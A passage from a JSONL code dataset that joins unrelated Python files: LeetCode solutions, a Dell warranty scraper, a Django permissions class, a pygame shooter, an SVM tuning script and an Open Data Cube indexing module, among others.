Enums\")\nprint(\"Enums are like numbers but in text that's easier to remember. Example:\")\nprint(\n \"\"\"```lua\nset_callback(function()\n if state.theme == THEME.COSMIC_OCEAN then\n x, y, l = get_position(players[1].uid)\n spawn(ENT_TYPE.ITEM_JETPACK, x, y, l, 0, 0)\n end\nend, ON.LEVEL)\n```\"\"\"\n)\nfor type in enums:\n print(\"### \" + type[\"name\"])\n if \"comment\" in type:\n for com in type[\"comment\"]:\n print(com)\n for var in type[\"vars\"]:\n if var[\"name\"]:\n print(\n \"- [`\"\n + var[\"name\"]\n + \"`](https://github.com/spelunky-fyi/overlunky/search?l=Lua&q=\"\n + type[\"name\"]\n + \".\"\n + var[\"name\"]\n + \") \"\n + var[\"type\"]\n )\n else:\n print(\"- \" + var[\"type\"])\n if \"docs\" in var:\n print(var[\"docs\"])\n\nprint(\"## Aliases\")\nprint(\n \"We use those to clarify what kind of values can be passed and returned from a function, even if the underlying type is really just an integer or a string. This should help to avoid bugs where one would for example just pass a random integer to a function expecting a callback id.\"\n)\nfor alias in aliases:\n name = alias[\"name\"]\n type = alias[\"type\"]\n print(f\"### {name} == {type}\")\n\nprint(\"## External Function Library\")\nprint(\n 'If you use a text editor/IDE that has a Lua linter available you can download [spel2.lua](https://raw.githubusercontent.com/spelunky-fyi/overlunky/main/docs/game_data/spel2.lua), place it in a folder of your choice and specify that folder as a \"external function library\". For example [VSCode](https://code.visualstudio.com/) with the [Lua Extension](https://marketplace.visualstudio.com/items?itemName=sumneko.lua) offers this feature. This will allow you to get auto-completion of API functions along with linting'\n)\n","sub_path":"docs/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":30509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"492095763","text":"#!/usr/bin/env python\n'''\nCreated on 22 May 2019\n\n@author: qubix\n'''\n\nimport sys\nimport argparse\nimport os\n\nfrom utils.selection import select_bbox, select_seg_model, select_green_model\nfrom API.tile_manager import TileManager\nfrom utils.mapping import create_map\n\n\ndef main():\n parser = argument_parser()\n args = parser.parse_args(sys.argv[1:])\n compute_map(**vars(args))\n\n\ndef argument_parser():\n parser = argparse.ArgumentParser(\n prog=sys.argv[0],\n description=\"Mapping of greenery from street level imagery.\"\n )\n parser.add_argument(\n \"-m\", \"--model\",\n type=str,\n default=\"deeplab-mobilenet\",\n help=\"Machine learning model for segmentation of images. \"\n \"Default: 'deeplab-mobilenet'\"\n )\n parser.add_argument(\n \"-g\", \"--greenery-measure\",\n type=str,\n default=\"vegetation\",\n help=\"Greenery measure algorithm. \"\n \"Default: 'vegetation' \"\n \"Other options include {road, bus, sky, etc}.\"\n )\n parser.add_argument(\n \"-n\", \"--njobs\",\n type=int,\n default=1,\n dest=\"n_job\",\n help=\"Spread the work out over this many jobs. Default: 1\"\n )\n parser.add_argument(\n \"-i\", \"--jobid\",\n type=int,\n default=0,\n dest=\"job_id\",\n help=\"Id of the worker, should be in the range [0,njobs).\"\n )\n parser.add_argument(\n \"-b\", \"--bbox\",\n type=str,\n dest='bbox_str',\n default=\"amsterdam\",\n help=\"Bounding box of the map to be made. Format: \"\n \"'lat_SW,long_SW,lat_NE,long_NE'. Default: 'amsterdam'.\"\n )\n parser.add_argument(\n \"-l\", \"--grid-level\",\n type=int,\n dest=\"grid_level\",\n default=0,\n help=\"Set the detail of the grid, starting from 0 at a resolution of\"\n \" 1 per km, doubling the resolution by a factor of 2 for each\"\n \" level.\"\n )\n parser.add_argument(\n \"--skip-overlay\",\n default=False,\n dest=\"skip_overlay\",\n action='store_true',\n help=\"Do not create a kriged overlayed map.\"\n )\n parser.add_argument(\n \"--prepare\",\n default=False,\n dest=\"prepare_only\",\n action=\"store_true\",\n help=\"Only prepare the data, do not compute anything.\"\n )\n parser.add_argument(\n \"--panorama\",\n default=False,\n dest=\"use_panorama\",\n action=\"store_true\",\n help=\"Use panorama pictures instead of cubic pictures\"\n )\n return parser\n\n\ndef compute_map(model='deeplab-mobilenet', greenery_measure='vegetation',\n n_job=1, job_id=0, bbox_str='amsterdam', grid_level=0,\n skip_overlay=False, prepare_only=False, use_panorama=False):\n bbox = select_bbox(bbox_str)\n seg_kwargs = select_seg_model(model)\n green_kwargs = select_green_model(greenery_measure)\n cubic_pictures = not use_panorama\n\n tile_man = TileManager(bbox=bbox, grid_level=grid_level, n_job=n_job,\n job_id=job_id, **seg_kwargs, \n cubic_pictures=cubic_pictures,\n **green_kwargs)\n\n tile_man.green_direct(prepare_only=prepare_only)\n\n if prepare_only or skip_overlay:\n return\n\n overlay, key = tile_man.krige_map()\n overlay_dir = os.path.join(\"data.amsterdam\", \"maps\")\n overlay_file = f\"{bbox_str}_{key}.html\"\n overlay_fp = os.path.join(overlay_dir, overlay_file)\n os.makedirs(overlay_dir, exist_ok=True)\n\n create_map(overlay, html_file=overlay_fp)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"streetgreen.py","file_name":"streetgreen.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553018956","text":"class InvalidInput_RPS(Exception): pass\n\n# Possible game inputs\nOPTIONS = [1, 2, 3]\nINPUTS_TO_STRINGS = {1:'R', 2:'P', 3:'S'} # Not sure if I'll even use these dicts\nSTRINGS_TO_INPUTS = {string: input for input, string in INPUTS_TO_STRINGS.items()} # Reverse the dict above\n\n\ndef rps_round(input1, input2):\n '''\n # Evaluates one round of RPS. This is the lowest level function for the game.\n :param input1: This is the player input. String. 1, 2, or 3.\n :param input2: This is the computer (opponent) input. String. 1, 2, or 3.\n :return:\n '''\n global OPTIONS\n if (input1 not in OPTIONS) or (input2 not in OPTIONS):\n raise InvalidInput_RPS('Input must be 1 (Rock), 2 (Paper), or 3 (Scissors).'\n f'You entered {input1} and {input2}.')\n\n r, p, s = OPTIONS\n win_matrix = {r: {r: 0, # i.e., if input1 is rock, input2 is rock = tie\n p: -1, # input2 is paper = loss\n s: 1}, # input2 is scissors = win\n p: {r: 1,\n p: 0,\n s: -1},\n s: {r: -1,\n p: 1,\n s: 0}\n }\n\n outcome = win_matrix[input1][input2]\n return outcome\n","sub_path":"source/game/rps_game.py","file_name":"rps_game.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"605272296","text":"class Solution(object):\n def countAndSay(self, n):\n \"\"\"\n :type n: int\n :rtype: str\n \"\"\"\n result = str(n)\n for i in range(n):\n result = self.scanAndCompose(result)\n return result\n\n def scanAndCompose(self, number_string):\n last = number_string[0]\n count = 1\n result = ''\n for index in range(1, len(number_string)):\n if number_string[index] == last:\n count += 1\n else:\n result += str(count) + last\n last = number_string[index]\n count = 1\n else:\n result += str(count) + last\n\n return result\n\na = Solution()\n","sub_path":"Python/CountandSay.py","file_name":"CountandSay.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"632697481","text":"# -*- coding: utf-8 -*- \n# leetcode time cost : 60 ms\n# leetcode memory cost : 15.1 MB \n# Time Complexity: O(N)\n# Space Complexity: O(1)\nfrom typing import List\nclass Solution:\n def canJump(self, nums: List[int]) -> bool:\n if len(nums) == 1: return True # 如果只有一个元素则一定可以到达\n max_distance = 0 # 设定可以达到的最大坐标\n for i in range(len(nums)):\n if i > max_distance: # 表示当前坐标无法跳跃达到\n return False\n max_distance = max(max_distance, i + nums[i]) # 更新可以达到的最远坐标\n return True \n \ndef main():\n nums = [2,3,1,1,4]\n expect = True\n obj = Solution()\n result = obj.canJump(nums)\n try:\n assert result == expect\n print(\"passed, result is follow expect:\",result)\n except AssertionError as aError:\n print('failed, result is wrong', result, aError.__str__())\n \nif __name__ =='__main__':\n main() ","sub_path":"[0055][Medium][Jump_Game]/Jump_Game_3.py","file_name":"Jump_Game_3.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"318895445","text":"from bs4 import BeautifulSoup\nimport time\nimport requests\nfrom datetime import datetime\n\n# get the device's ship date\ndef shipDate(serial):\n url = \"https://www.dell.com/support/components/dashboard/us/en/04/Warranty/GetWarrantyDetails\"\n # make a post request to dell warrenty site\n r = requests.post(url, data=dict(\n serviceTag=str(serial),\n isSerializedProduct=False\n ))\n # successful extract the name of the device\n if r.status_code == 200:\n soup = BeautifulSoup(r.text, \"html.parser\")\n tds = soup.find_all(\"td\")\n shipDate = \"\"\n for dataCell in tds:\n data = str(dataCell.text.strip())\n index = data.find(\"Ship Date\")\n if index != -1:\n shipDate = data[(data.find(\": \") + 2):]\n shipDate = datetime.strptime(shipDate, '%d %b %Y').date()\n shipDate = datetime.strftime(shipDate, '%m/%d/%Y')\n return shipDate\n # could not get the ship date\n else:\n return False\n\n# get the device's name\ndef name(serial):\n url = \"https://www.dell.com/support/home/us/en/04/product-support/servicetag/{}/events\".format(serial)\n name = \"\"\n r = requests.post(url)\n if r.status_code == 200:\n try:\n soup = BeautifulSoup(r.text, \"html.parser\")\n h1 = soup.find(\"h1\")\n h1 = str(h1.text.strip())\n name = h1[h1.index(\"Support for\") + len(\"Support for\") + 1:].split('\\n')[0]\n return name\n except:\n pass\n return False\n","sub_path":"info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"274576064","text":"from rest_framework.reverse import reverse\nfrom scanner.tasks import Scanner\nfrom models import Monitor, PeriodicTask, ScanReport\n\n\nclass Monitoring(Scanner):\n def run(self, target_url):\n self._target_url = target_url\n self.scan()\n\n periodic_task = PeriodicTask.objects.get(\n name=target_url\n )\n\n monitor = Monitor.objects.get(\n periodic_task=periodic_task\n )\n\n monitor.report = ScanReport(\n result=self.get_report()\n )\n monitor_report = monitor.report\n monitor_report.target_url = target_url\n monitor_report.result_url = reverse(\n viewname='report-view',\n args=[monitor_report.pk]\n )\n monitor_report.save()\n\n monitor.save()\n","sub_path":"monitoring/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"474799638","text":"\r\n\r\nimport tkinter as tk\r\nimport re\r\nimport Calendar\r\nfrom Notes_widget import show_notes_widget\r\n\r\n\r\nclass MainMenu(tk.Frame):\r\n def __init__(self, parent,):\r\n super().__init__(parent)\r\n self.init_main(parent)\r\n\r\n # Configuring Frame object on the Main window\r\n def init_main(self, parent):\r\n self.btn1 = tk.Button(text='Show my notes', width=20, height=3,\r\n command=lambda : Calendar.show_calendar(parent, self.get_root_position()))\r\n self.btn2 = tk.Button(text='Enter your notes', width=20, height=3,\r\n command=lambda : show_notes_widget(self.get_root_position()))\r\n\r\n self.btn1.pack()\r\n self.btn2.pack()\r\n\r\n def get_root_position(self):\r\n self.update_idletasks()\r\n self.width, self.height, self.x, self.y = re.split(r'[x+]', root.geometry())\r\n return self.width, self.height, self.x, self.y\r\n\r\n\r\nif __name__ == '__main__':\r\n # Creating Main window\r\n root = tk.Tk()\r\n root.title('ИВРО')\r\n root.update_idletasks()\r\n root.width = 180\r\n root.height = 110\r\n root.x = (root.winfo_screenwidth() - root.winfo_reqwidth()) / 2\r\n root.y = (root.winfo_screenheight() - root.winfo_reqheight()) / 2\r\n root.geometry(f'{root.width}x{root.height}+{int(root.x - root.width / 2)}+{int(root.y - root.height / 2)}')\r\n root.resizable(False, False)\r\n\r\n # Creating Frame object\r\n app = MainMenu(root)\r\n app.pack()\r\n\r\n root.mainloop()\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"343726817","text":"import math\nimport random\nimport pygame\nfrom pygame import mixer\n\n# Intialize the pygame\npygame.init()\n\n# create the screen\nscreen = pygame.display.set_mode((800, 600))\n\n# Background\nbackground = pygame.image.load('battleground.jpg')\n\n# Sound\nmixer.music.load(\"happysound.mp3\")\nmixer.music.play(-1)\n\n# Caption and Icon\npygame.display.set_caption(\"Shinigami Spell\")\nicon = pygame.image.load('sanfire.png')\npygame.display.set_icon(icon)\n\n# warrior\nwarriorImg = pygame.image.load('warrior.png')\nwarriorX = 370\nwarriorY = 530\nwarriorX_change = 0\n\n# Shinigami\nShinigamiImg = []\nShinigamiX = []\nShinigamiY = []\nShinigamiX_change = []\nShinigamiY_change = []\nnum_of_Shinigamies = 5\n\nfor i in range(num_of_Shinigamies):\n ShinigamiImg.append(pygame.image.load('sanfire.png'))\n ShinigamiX.append(random.randint(0, 736))\n ShinigamiY.append(random.randint(30, 150))\n ShinigamiX_change.append(4)\n ShinigamiY_change.append(40)\n\n# Spell\n\n# Ready - You can't see the spell on the screen\n# Fire - The spell is currently moving\n\nspellImg = pygame.image.load('fireworks.png')\nspellX = 0\nspellY = 480\nspellX_change = 0\nspellY_change = 5\nspell_state = \"ready\"\n\n# Score\n\nscore_value = 0\nfont = pygame.font.Font('freesansbold.ttf', 32)\n\ntextX = 10\ntestY = 10\n\n# Game Over\nover_font = pygame.font.Font('freesansbold.ttf', 64)\n\n\ndef show_score(x, y):\n score = font.render(\"Score : \" + str(score_value), True, (255, 255, 255))\n screen.blit(score, (x, y))\n\n\ndef game_over_text():\n over_text = over_font.render(\"GAME OVER\", True, (255, 255, 255))\n screen.blit(over_text, (200, 250))\n\n\ndef warrior(x, y):\n screen.blit(warriorImg, (x, y))\n\n\ndef Shinigami(x, y, i):\n screen.blit(ShinigamiImg[i], (x, y))\n\n\ndef fire_spell(x, y):\n global spell_state\n spell_state = \"fire\"\n screen.blit(spellImg, (x + 16, y + 10))\n\n\ndef isCollision(ShinigamiX, ShinigamiY, spellX, spellY):\n distance = math.sqrt(math.pow(ShinigamiX - spellX, 2) + (math.pow(ShinigamiY - spellY, 2)))\n if distance < 27:\n return True\n else:\n return False\n\n\n# Game Loop\nrunning = True\nwhile running:\n\n # RGB = Red, Green, Blue\n screen.fill((0, 0, 0))\n # Background Image\n screen.blit(background, (0, 0))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n # if keystroke is pressed check whether its right or left\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n warriorX_change = -5\n if event.key == pygame.K_RIGHT:\n warriorX_change = 5\n if event.key == pygame.K_SPACE:\n if spell_state==\"ready\":\n spellSound = mixer.Sound(\"magicspellmusic.mp3\")\n spellSound.play()\n # Get the current x cordinate of the spaceship\n spellX = warriorX\n fire_spell(spellX, spellY)\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n warriorX_change = 0\n\n # 5 = 5 + -0.1 -> 5 = 5 - 0.1\n # 5 = 5 + 0.1\n\n warriorX += warriorX_change\n if warriorX <= 0:\n warriorX = 0\n elif warriorX >= 736:\n warriorX = 736\n\n # Shinigami Movement\n for i in range(num_of_Shinigamies):\n\n # Game Over\n if ShinigamiY[i] > 440:\n for j in range(num_of_Shinigamies):\n ShinigamiY[j] = 2000\n game_over_text()\n break\n\n ShinigamiX[i] += ShinigamiX_change[i]\n if ShinigamiX[i] <= 0:\n ShinigamiX_change[i] = 1\n ShinigamiY[i] += ShinigamiY_change[i]\n elif ShinigamiX[i] >= 736:\n ShinigamiX_change[i] = -1\n ShinigamiY[i] += ShinigamiY_change[i]\n\n # Collision\n collision = isCollision(ShinigamiX[i], ShinigamiY[i], spellX, spellY)\n if collision:\n explosionSound = mixer.Sound(\"fireball.mp3\")\n explosionSound.play()\n spellY = 480\n spell_state = \"ready\"\n score_value += 1\n ShinigamiX[i] = random.randint(0, 736)\n ShinigamiY[i] = random.randint(50, 150)\n\n Shinigami(ShinigamiX[i], ShinigamiY[i], i)\n\n # spell Movement\n if spellY <= 0:\n spellY = 480\n spell_state = \"ready\"\n\n if spell_state ==\"fire\":\n fire_spell(spellX, spellY)\n spellY -= spellY_change\n\n warrior(warriorX, warriorY)\n show_score(textX, testY)\n pygame.display.update()\n","sub_path":"shinigamispellcode.py","file_name":"shinigamispellcode.py","file_ext":"py","file_size_in_byte":4525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"228479983","text":"from django.contrib.auth.models import Permission\n\nfrom DeBar.classes import Text\nfrom DeBar.funcoes.function import getUser\nfrom DeBar.funcoes.getdata import getAllPermissoes\n\nclass Permissoes(object):\n\n def __init__(self, request, user=None):\n\n self.request = request\n self.user = user\n self.permissoes = {}\n\n permissoesBanco = self.getAllPermissoes()\n\n for perm in permissoesBanco.items():\n\n dict = {perm[1].keys()[0]: perm[1].items()[0][1]}\n self.permissoes.update(dict)\n\n def getPermissoesTela(self):\n\n for nome, texto in self.permissoes.items():\n\n try:\n marcadoTela = self.request.POST.get(nome)\n if marcadoTela == 'on':\n\n self.permissoes[nome]['marcadoNaTela'] = True\n except Exception as e:\n teste = e.message\n pass\n\n def darPermissoes(self, user):\n\n for nome, texto in self.permissoes.items():\n try:\n\n objetoPermissao = Permission.objects.get(codename = nome)\n if self.permissoes[nome]['marcadoNaTela']:\n\n user.user_permissions.add(objetoPermissao)\n\n else:\n\n user.user_permissions.remove(objetoPermissao)\n except:\n self.mensagem = Text().erro_dar_permissoes()\n\n def darTodasPermissoes(self, user):\n\n for nome in self.permissoes:\n try:\n objetoPermissao = Permission.objects.get(codename = nome)\n user.user_permissions.add(objetoPermissao)\n except Exception as e:\n self.mensagem = Text().erro_dar_permissoes()\n\n\n def getAllPermissoes(self):\n\n import django.apps\n\n modelos = django.apps.apps.get_models()\n perm_dict = None\n\n for modelo in modelos:\n try:\n permissoes = modelo._meta.original_attrs['permissions']\n perm = None\n\n for permissao in permissoes:\n if perm:\n if self.user:\n perm.update({permissao[0] : {\"texto\" :permissao[1],\n \"temPermissao\" : self.user.has_perm(\"DeBar.\" + permissao[0]),\n \"marcadoNaTela\": None}})\n else:\n perm.update({permissao[0]: {\"texto\": permissao[1],\n \"temPermissao\": False,\n \"marcadoNaTela\": None}})\n\n else:\n if self.user:\n perm = {permissao[0] : {\"texto\" :permissao[1],\n \"temPermissao\" :self.user.has_perm(\"DeBar.\" + permissao[0]),\n \"marcadoNaTela\": None}}\n else:\n perm = {permissao[0]: {\"texto\": permissao[1],\n \"temPermissao\": False,\n \"marcadoNaTela\": None}}\n else:\n if perm_dict:\n perm_dict.update({modelo._meta.verbose_name: perm})\n else:\n perm_dict = {modelo._meta.verbose_name: perm}\n except Exception as e:\n coisa = e.message\n pass\n\n return perm_dict\n\n","sub_path":"DeBar/classes/usuario/permissoes.py","file_name":"permissoes.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"411759642","text":"from py3dbp import Item, Bin, Packer\nprint('start')\nfrom copy import deepcopy\n\npacker = Packer()\n\npacker.add_bin(Bin('small-envelope 1', 85, 85, 85, 124))\n\nfor j in range(11):\n a = Item('Beauty & Personal Care {}'.format(j), 19, 19, 19, 12)\n packer.add_item(a)\n\nfor j in range(14):\n a = Item('Tools & Home Improvement {}'.format(j), 6, 6, 6, 4)\n packer.add_item(a)\n \nfor j in range(8):\n a = Item('Audible Books & Originals {}'.format(j), 15, 15, 15, 8)\n packer.add_item(a)\n\nimport time\nnow = time.time()\npacker_1 = deepcopy(packer)\npacker_2 = deepcopy(packer)\n\npacker = packer_1\npacker.algorithm_1()\nprint('start')\nfor b in packer.bins:\n print(b.string())\n for i in b.items:\n print(\"====> \", i.string())\nif packer.unfit_items:\n print('Unfit items')\n for b in packer.unfit_items:\n print(\"====> \", b.string())\n\npacker = packer_2\npacker.algorithm_2()\n\nprint('start')\nfor b in packer.bins:\n print(b.string())\n for i in b.items:\n print(\"====> \", i.string())\nif packer.unfit_items:\n print('Unfit items')\n for b in packer.unfit_items:\n print(\"====> \", b.string())\nprint(time.time() - now)","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"129095386","text":"import sys\n\n\nclass DrawingTool:\n def __init__(self, in_file_name='input.txt', out_file_name='output.txt'):\n try:\n if sys.argv[1] == 'help':\n help_print()\n sys.exit(0)\n except IndexError:\n pass\n try:\n self.input_file_name = sys.argv[1]\n open(self.input_file_name)\n except IndexError:\n self.input_file_name = in_file_name\n except OSError:\n print('Please enter a valid \"input file\" name (default: \"input.txt\")')\n help_print()\n sys.exit(0)\n try:\n self.output_file_name = sys.argv[2]\n except IndexError:\n self.output_file_name = out_file_name\n self.command_list = ['C', 'L', 'R', 'B']\n self.canvas = []\n\n def draw(self):\n with open(self.input_file_name) as command_set:\n for parameter in command_set.readlines():\n parameter = parameter.split()\n if parameter[0] in self.command_list:\n if parameter[0] == self.command_list[0]:\n self.create_canvas(parameter[1], parameter[2])\n if len(self.canvas) != int(parameter[2]) or len(self.canvas[0]) != int(parameter[1]):\n raise Exception('not valid canvas has been created')\n self.paint()\n if parameter[0] == self.command_list[1]:\n self.create_line(parameter[1], parameter[2], parameter[3], parameter[4])\n self.paint()\n elif parameter[0] == self.command_list[2]:\n self.create_rect(parameter[1], parameter[2], parameter[3], parameter[4])\n self.paint()\n elif parameter[0] == self.command_list[3]:\n self.bucket_fill(parameter[1], parameter[2], parameter[3])\n self.paint()\n else:\n raise Exception('Input file is not valid')\n\n def create_canvas(self, size_x, size_y):\n for string in range(int(size_y)):\n self.canvas.append([])\n for symbol in range(int(size_x)):\n self.canvas[string].append(' ')\n\n def create_line(self, x1, y1, x2, y2):\n x1, y1, x2, y2 = int(x1), int(y1), int(x2), int(y2)\n if y2 - y1 == 0:\n for string in range(y1 - 1, y2):\n if x2 - x1 > 0:\n for symbol in range(x1 - 1, x2):\n self.canvas[string][symbol] = 'x'\n else:\n self.canvas[string][x1] = 'x'\n elif y2 - y1 > 0:\n for string in range(y1 - 1, y2):\n self.canvas[string][x1 - 1] = 'x'\n\n def create_rect(self, x1, y1, x2, y2):\n self.create_line(x1, y1, x2, y1)\n self.create_line(x1, y2, x2, y2)\n self.create_line(x1, y1, x1, y2)\n self.create_line(x2, y1, x2, y2)\n\n def bucket_fill(self, x, y, color):\n x, y = int(x), int(y)\n if self.canvas[y][x] == ' ':\n self.canvas[y][x] = color\n if x > 0:\n self.bucket_fill(x-1, y, color)\n if x < len(self.canvas[0])-1:\n self.bucket_fill(x + 1, y, color)\n if y < len(self.canvas) - 2:\n self.bucket_fill(x, y+1, color)\n if y > 0:\n self.bucket_fill(x, y - 1, color)\n\n def paint(self):\n with open(self.output_file_name, 'a') as out:\n out.write('-' * (len(self.canvas[0]) + 2))\n out.write('\\n')\n for string in self.canvas:\n out.write('|')\n for symbol in string:\n out.write(symbol)\n out.write('|\\n')\n out.write('-' * (len(self.canvas[0]) + 2))\n out.write('\\n')\n\n\ndef help_print():\n print('Drawing tool syntax:\\n\\n', '', 'python program.py \"input_filename\" \"output_filename\"\\n', )\n\n\nif __name__ == \"__main__\":\n tool = DrawingTool()\n tool.draw()\n","sub_path":"program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":4072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"642440238","text":"#-*- coding=UTF-8 -*-\nfrom PIL import Image\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import train_test_split\nimport os\nimport sys\nimport numpy as np\nimport time\nfrom sklearn import svm\nfrom tuning import grid_search\nimport utils \nimport analysis\nimport matplotlib.pyplot as plt\nimport joblib\n\n# create model\ndef create_svm(dataMat, dataLabel,path,decision='ovr'):\n\n param_grid = [{'kernel': ['linear'], 'C': [0.01, 0.1, 1, 10, 100, 1000, 10000],'decision_function_shape': ['ovr']}]\n print(\"Parameters:{}\".format(param_grid))\n scores = ['precision', 'recall']\n print(\"Tuning parameters: %s\" % param_grid)\n clf_list = grid_search(param_grid, scores, [dataMat, dataLabel], './tuning4/tuningt.txt')\n \n return clf_list\n\ndef model_test(model_path, clf=None, filename='out.txt', tcName=['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']):\n path = sys.path[0]\n tbasePath = os.path.join(path, \"mnist/test/\")\n #tcName = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n tst = time.time()\n f = open(filename, \"w\")\n feature_cnt = len(tcName)\n allErrCount = 0; allErrorRate = 0.0; allScore = 0.0\n ErrCount=np.zeros(feature_cnt,int); TrueCount=np.zeros(feature_cnt,int)\n predict_list = []; true_list = []\n\n if clf == None:\n clf = joblib.load(model_path)\n\n for tcn in tcName:\n testPath = tbasePath + tcn\n tflist = utils.file2list(testPath)\n tdataMat, tdataLabel = utils.read2convert(tflist)\n print(\"test dataMat shape: {0}, test dataLabel len: {1} \".format(tdataMat.shape, len(tdataLabel)), file=f)\n pre_st = time.time(); preResult = clf.predict(tdataMat); pre_et = time.time()\n predict_list.append(preResult); true_list.append([tcn]*len(preResult))\n print(\"Recognition \" + tcn + \" spent {:.4f}s.\".format((pre_et - pre_st)), file=f)\n print(\"predict result: {}\".format(len(preResult)))\n errCount = len([x for x in preResult if x != tcn])\n ErrCount[int(tcn)]=errCount\n TrueCount[int(tcn)]= len(tdataLabel)-errCount\n print(\"errorCount: {}.\".format(errCount), file=f)\n allErrCount += errCount\n score_st = time.time()\n score = clf.score(tdataMat, tdataLabel)\n score_et = time.time()\n print(\"computing score spent {:.6f}s.\".format(score_et - score_st), file=f)\n allScore += score\n print(\"score: {:.6f}.\".format(score), file=f)\n print(\"error rate is {:.6f}.\".format((1 - score)), file=f)\n \n tet = time.time()\n print(\"Testing All class total spent {:.6f}s.\".format(tet - tst), file=f)\n print(\"All error Count is: {}.\".format(allErrCount), file=f)\n avgAccuracy = allScore / (feature_cnt*1.0)\n print(\"Average accuracy is: {:.6f}.\".format(avgAccuracy), file=f)\n print(\"Average error rate is: {:.6f}.\".format(1 - avgAccuracy), file=f)\n print(\"number\",\" TrueCount\",\" ErrCount\", file=f)\n for tcn in tcName:\n tcn=int(tcn)\n print(tcn,\" \",TrueCount[tcn],\" \",ErrCount[tcn], file=f)\n plt.figure(figsize=(12, 6))\n x=list(range(feature_cnt))\n plt.plot(x,TrueCount, color='blue', label=\"TrueCount\") # 将正确的数量设置为蓝色\n plt.plot(x,ErrCount, color='red', label=\"ErrCount\") # 将错误的数量为红色\n plt.legend(loc='best') # 显示图例的位置,这里为右下方\n plt.title('Projects')\n plt.xlabel('number') # x轴标签\n plt.ylabel('count') # y轴标签\n plt.xticks(np.arange(feature_cnt), tcName)\n plt.savefig('./accuracy_%s.jpg' % filename.split('_')[1])\n plt.show()\n f.close()\n\n true_list = np.array(true_list).flatten()\n predict_list = np.array(predict_list).flatten()\n return [predict_list, true_list]\n\nif __name__ == '__main__':\n\n st = time.time()\n iris = load_iris()\n\n dataMat, dataLabel = utils.read_folder_img(cName = ['1', '2', '3', '4', '5', '6', '7', '8', '9'], delimit=6)\n print(dataMat.shape); print(dataLabel)\n path = sys.path[0]\n model_path=os.path.join(path,'model/svm_best.model') \n \n clf_list = create_svm(dataMat, dataLabel, model_path, decision='ovr')\n i = 0; \n for clf in clf_list:\n scores = ['precision', 'accuracy']\n y_predict, y_true = model_test(model_path, clf, './tuning4/out_%s_test.txt' % scores[i], ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'])\n analysis.my_classification_report(y_true, y_predict, True, './tuning4/report_%s_test.txt' % scores[i])\n np.savetxt('./tuning4/y_pred_%s.txt' % scores[i], y_predict, fmt=\"%s\", delimiter=',')\n np.savetxt('./tuning4/y_true_%s.txt' % scores[i], y_true, fmt=\"%s\", delimiter=',')\n i += 1","sub_path":"raw/tune_core4.py","file_name":"tune_core4.py","file_ext":"py","file_size_in_byte":4655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"385286294","text":"import click\nimport logging\nimport importlib_resources\nfrom datadog import statsd, initialize\nfrom odc.aws.queue import publish_to_topic\nfrom typing import Iterable, Optional, Union\n\nfrom datacube import Datacube\nfrom datacube.index.hl import Doc2Dataset\nfrom datacube.utils import changes\nfrom ._stac import ds_to_stac\n\nESRI_LANDCOVER_BASE_URI = (\n \"https://ai4edataeuwest.blob.core.windows.net/io-lulc/\"\n \"io-lulc-model-001-v01-composite-v03-supercell-v02-clip-v01/{id}_20200101-20210101.tif\"\n)\n\nMICROSOFT_PC_STAC_URI = \"https://planetarycomputer.microsoft.com/api/stac/v1/\"\n\n\nclass IndexingException(Exception):\n \"\"\"\n Exception to raise for error during SQS to DC indexing/archiving\n \"\"\"\n\n\nclass SkippedException(Exception):\n \"\"\"\n Exception to raise for error if dataset exists and not updating\n \"\"\"\n\n\n# A whole bunch of generic Click options\nskip_lineage = click.option(\n \"--skip-lineage\",\n is_flag=True,\n default=False,\n help=\"Default is not to skip lineage. Set to skip lineage altogether.\",\n)\n\nfail_on_missing_lineage = click.option(\n \"--fail-on-missing-lineage/--auto-add-lineage\",\n is_flag=True,\n default=True,\n help=(\n \"Default is to fail if lineage documents not present in the database. \"\n \"Set auto add to try to index lineage documents.\"\n ),\n)\n\nverify_lineage = click.option(\n \"--verify-lineage\",\n is_flag=True,\n default=False,\n help=\"Default is no verification. Set to verify parent dataset definitions.\",\n)\n\ntransform_stac = click.option(\n \"--stac\",\n is_flag=True,\n default=False,\n help=\"Expect STAC 1.0 metadata and attempt to transform to ODC EO3 metadata.\",\n)\n\ntransform_stac_absolute = 